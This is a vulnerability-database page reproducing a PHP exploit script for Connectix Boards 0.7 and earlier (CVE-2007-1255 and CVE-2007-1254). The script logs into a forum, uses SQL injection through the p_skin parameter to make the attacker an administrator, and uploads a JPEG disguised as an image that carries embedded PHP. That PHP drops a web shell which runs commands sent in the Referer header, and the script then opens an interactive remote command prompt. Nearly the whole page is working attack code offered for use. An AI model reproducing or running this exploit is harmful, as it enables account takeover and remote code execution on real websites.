Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit

2007-03-08 / 2007-03-09

Credit: DarkFig

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2007-1255 | CVE-2007-1254

CWE: N/A

#!/usr/bin/php
<?php
/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);
if($argc < 9) {
print("
Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit
-------------------------------------------------------------------
PHP conditions: none
Credits: DarkFig <gmdarkfig (at) gmail (dot) com [email concealed]>
URL: http://www.acid-root.new.fr/
-------------------------------------------------------------------
Usage: $argv[0] -url <> -usr <> -pwd <> -type <> [Options]
Params: -url For example http://victim.com/connectix/
-usr The username of your account
-pwd The password of your account
-type Privilege Escalation(1) or Code execution(2)
Options: -proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
-------------------------------------------------------------------
"); exit(1);
}
$url = getparam('url',1);
$user = getparam('usr',1);
$pass = getparam('pwd',1);
$type = getparam('type',1);
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$theme = 'Zephyr';
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);
print "nTrying to get logged in";
$xpl->post($url.'index.php?act=login',"username=$user&password=$pass&rem
ember=on&confirm=Connexion+%21");
if(preg_match("#password#",$xpl->showcookie())) print "nLogged in";
else exit("nExploit failed");
sploit(", usr_class=1");
if($type==1) exit("nDone, $user is now admin.");
# Fake JPG (with php code) generated with edjpgcom.exe
#
# <?php $handle=fopen('mdrpipicacalolxdwtf.gif.php','w+');
# fwrite($handle,'<?php @system($_SERVER[HTTP_REFERER]); ?/>');
# fclose($handle); unlink($_SERVER[PHP_SELF]); ?/>
#
$f = "xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x01x01x00x60x00x6
0x00x00xFF"
."xDBx00x43x00x08x06x06x07x06x05x08x07x07x07x09x09x08x
0Ax0Cx14"
."x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14x1Dx1Ax1Fx1Ex1Dx1Ax1Cx
1Cx20x24"
."x2Ex27x20x22x2Cx23x1Cx1Cx28x37x29x2Cx30x31x34x34x34x
1Fx27x39"
."x3Dx38x32x3Cx2Ex33x34x32xFFxDBx00x43x01x09x09x09x0Cx
0Bx0Cx18"
."x0Dx0Dx18x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x
32x32x32"
."x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x
32x32x32"
."x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x
FFxFEx00"
."xA5x3Cx3Fx70x68x70x20x24x68x61x6Ex64x6Cx65x3Dx66x6Fx
70x65x6E"
."x28x27x6Dx64x72x70x69x70x69x63x61x63x61x6Cx6Fx6Cx78x
64x77x74"
."x66x2Ex67x69x66x2Ex70x68x70x27x2Cx27x77x2Bx27x29x3Bx
66x77x72"
."x69x74x65x28x24x68x61x6Ex64x6Cx65x2Cx27x3Cx3Fx70x68x
70x20x40"
."x73x79x73x74x65x6Dx28x24x5Fx53x45x52x56x45x52x5Bx48x
54x54x50"
."x5Fx52x45x46x45x52x45x52x5Dx29x3Bx20x3Fx3Ex27x29x3Bx
66x63x6C"
."x6Fx73x65x28x24x68x61x6Ex64x6Cx65x29x3Bx20x75x6Ex6Cx
69x6Ex6B"
."x28x24x5Fx53x45x52x56x45x52x5Bx50x48x50x5Fx53x45x4Cx
46x5Dx29"
."x3Bx20x3Fx3ExFFxC0x00x11x08x00x01x00x01x03x01x22x00x
02x11x01"
."x03x11x01xFFxC4x00x1Fx00x00x01x05x01x01x01x01x01x01x
00x00x00"
."x00x00x00x00x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFx
C4x00xB5"
."x10x00x02x01x03x03x02x04x03x05x05x04x04x00x00x01x7Dx
01x02x03"
."x00x04x11x05x12x21x31x41x06x13x51x61x07x22x71x14x32x
81x91xA1"
."x08x23x42xB1xC1x15x52xD1xF0x24x33x62x72x82x09x0Ax16x
17x18x19"
."x1Ax25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43x44x45x
46x47x48"
."x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x
6Ax73x74"
."x75x76x77x78x79x7Ax83x84x85x86x87x88x89x8Ax92x93x94x
95x96x97"
."x98x99x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6x
B7xB8xB9"
."xBAxC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8x
D9xDAxE1"
."xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8x
F9xFAxFF"
."xC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01x01x00x00x
00x00x00"
."x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5x11x
00x02x01"
."x02x04x04x03x04x07x05x04x04x00x01x02x77x00x01x02x03x
11x04x05"
."x21x31x06x12x41x51x07x61x71x13x22x32x81x08x14x42x91x
A1xB1xC1"
."x09x23x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1x17x
18x19x1A"
."x26x27x28x29x2Ax35x36x37x38x39x3Ax43x44x45x46x47x48x
49x4Ax53"
."x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x6Ax73x74x
75x76x77"
."x78x79x7Ax82x83x84x85x86x87x88x89x8Ax92x93x94x95x96x
97x98x99"
."x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8x
B9xBAxC2"
."xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAx
E2xE3xE4"
."xE5xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx
00x0Cx03"
."x01x00x02x11x03x11x00x3Fx00xF7xFAx28xA2x80x3FxFFxD9";
# +admin.bbcode.php
# |
# 95. if(isset($_POST['wherefile'])) {
# 96. if ($_POST['wherefile']=='upload') {
# 97. if (!empty($_FILES['uploadimage']['size'])){
# 98. if ($image=getimagesize(trim($_FILES['uploadimage']['tmp_name']))) {
# 99. $val = array(IMAGETYPE_GIF,IMAGETYPE_JPEG,IMAGETYPE_PNG);
# 100. if ($_FILES['uploadimage']['size'] <= 20480 && in_array($image[2],$val)) {
# 101. $filename = $smile->smiley_librariesdir.$_POST['sm_filenameserver'];
# 102. $filename = str_replace('../','',trim($filename));
# 103. //si le filenameserver contient un dossier : on cre ce dossier:
# 104. mkdirs($smile->smiley_dir.dirname($filename));
# 105. if (move_uploaded_file($_FILES['uploadimage']['tmp_name'], $smile->smiley_dir.$_POST['sm_filenameserver'])) {
# 106. $do=true;
# 107. }
#
$arr = array(frmdt_url => $url.'admin.php?act=bb&#138;&#130;=4',
"sm_name" => ":AbCdEfGhIj1234dsupersmilepowaa:",
"sm_filenamesubdir" => "libraries/",
"sm_filenameserver" => "xd.gif.php",
"wherefile" => "upload",
"sm_send" => "Confirmer",
"uploadimage" => array(frmdt_type => "image/gif",
frmdt_filename => "xd.gif.php",
frmdt_content => $f));
$xpl->formdata($arr);
$xpl->get($url."smileys/xd.gif.php");
print "n$shell> ";
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
$xpl->addheader("Referer",$cmd);
$xpl->get($url."smileys/mdrpipicacalolxdwtf.gif.php");
print $xpl->getcontent()."n$shell> ";
}
function sploit($sql)
{
global $url,$xpl,$theme,$user;
$pdat = "changeparams=1"
."&p_usrs=20"
."&p_topics=20"
."&p_msgs=15"
."&p_res=12"
."&p_skin=$theme"
."%00',usr_pref_skin='$theme',usr_signature=(SELECT '[XPL_IS_OK]')$sql WHERE usr_name='$user' #"
."&p_lang=fr"
."&p_timezone=1";
# +common.php
# |
# 95. function cleanArray(&$arr) {
# 96. if (!empty($arr) && is_array($arr)) {
# 97. foreach($arr as $k => $v) {
# 98. if (is_array($v)) cleanArray($arr[$k]);
# 99. else $arr[$k] = stripslashes($v);
# 100. }
# 101. }
# 102. }
# |
# 105. if (get_magic_quotes_gpc()) {
# 106. cleanArray($_POST);
# 107. cleanArray($_COOKIE);
# 108. cleanArray($_GET);
# 109. }
#
# +part.userprofile.php
# |
# 305. /* Changement des param&#232;tres d'affichage (pas accessible par les modos ou admins) */
# 306. } elseif (isset($_POST['changeparams']) && $edit_id==$_SESSION['userid']) {
# 307. if ( isset($_POST['p_usrs'],$_POST['p_topics'],$_POST['p_msgs'],$_POST['p_res
'],$_POST['p_skin'],$_POST['p_lang'],$_POST['p_timezone']) ) {
# 308. if (is_numeric($_POST['p_usrs']) && is_numeric($_POST['p_topics']) && is_numeric($_POST['p_msgs']) && is_numeric($_POST['p_res']) && isLang($_POST['p_lang']) && isSkin($_POST['p_skin'])) {
# 309. if ((int)$_POST['p_usrs']>=5 && (int)$_POST['p_usrs']<=50 && (int)$_POST['p_topics']>=5 && (int)$_POST['p_topics']<=50 && (int)$_POST['p_msgs']>=5 && (int)$_POST['p_msgs']<=50 && (int)$_POST['p_res']>=5 && (int)$_POST['p_res']<=50 && in_array($_POST['p_timezone'],array_keys($timezones))) {
# 310. $GLOBALS['cb_db']->query("UPDATE ".$GLOBALS['cb_db']->prefix."users SET usr_pref_msgs='".(int)$_POST['p_msgs']."',usr_pref_usrs='".(int)$_POST['
p_usrs']."',usr_pref_topics='".(int)$_POST['p_topics']."',usr_pref_res='
".(int)$_POST['p_res']."',usr_pref_lang='".$_POST['p_lang']."',usr_pref_
skin='".$_POST['p_skin']."',usr_pref_timezone='".$_POST['p_timezone']."'
,usr_pref_ctsummer=".((int)(isset($_POST['p_ctsummer']) && $_POST['p_ctsummer']=='on'))." WHERE usr_id=".$_SESSION['cb_user']->userid);
# 311. $_SESSION['cb_user']->reloadnext=true;
# 312. redirect(manage_url('index.php?act=user&editprofile='.$_SESSION['userid'
].'&page=6','forum-profile'.$_SESSION['userid'].'-params.html'));
#
# +lib.cb.php
# |
# 117. function isLang ($langtype) {
# 118. return is_dir(CB_PATH.'lang/'.$langtype);
# 119. }
# |
# 133. function isSkin ($skintype) {
# 134. return is_dir(CB_PATH.'skins/'.$skintype);
# 135. }
$xpl->post($url."index.php?act=user&editprofile=-1&page=6",$pdat);
$xpl->get($url."index.php?act=user&editprofile=-1&page=5");
if(preg_match('#[XPL_IS_OK]#',$xpl->getcontent())) return;
else exit("Exploit failed");
}
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) return $argv[$value+1];
}
if($opt) exit("n-$param parameter required");
else return;
}
?>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.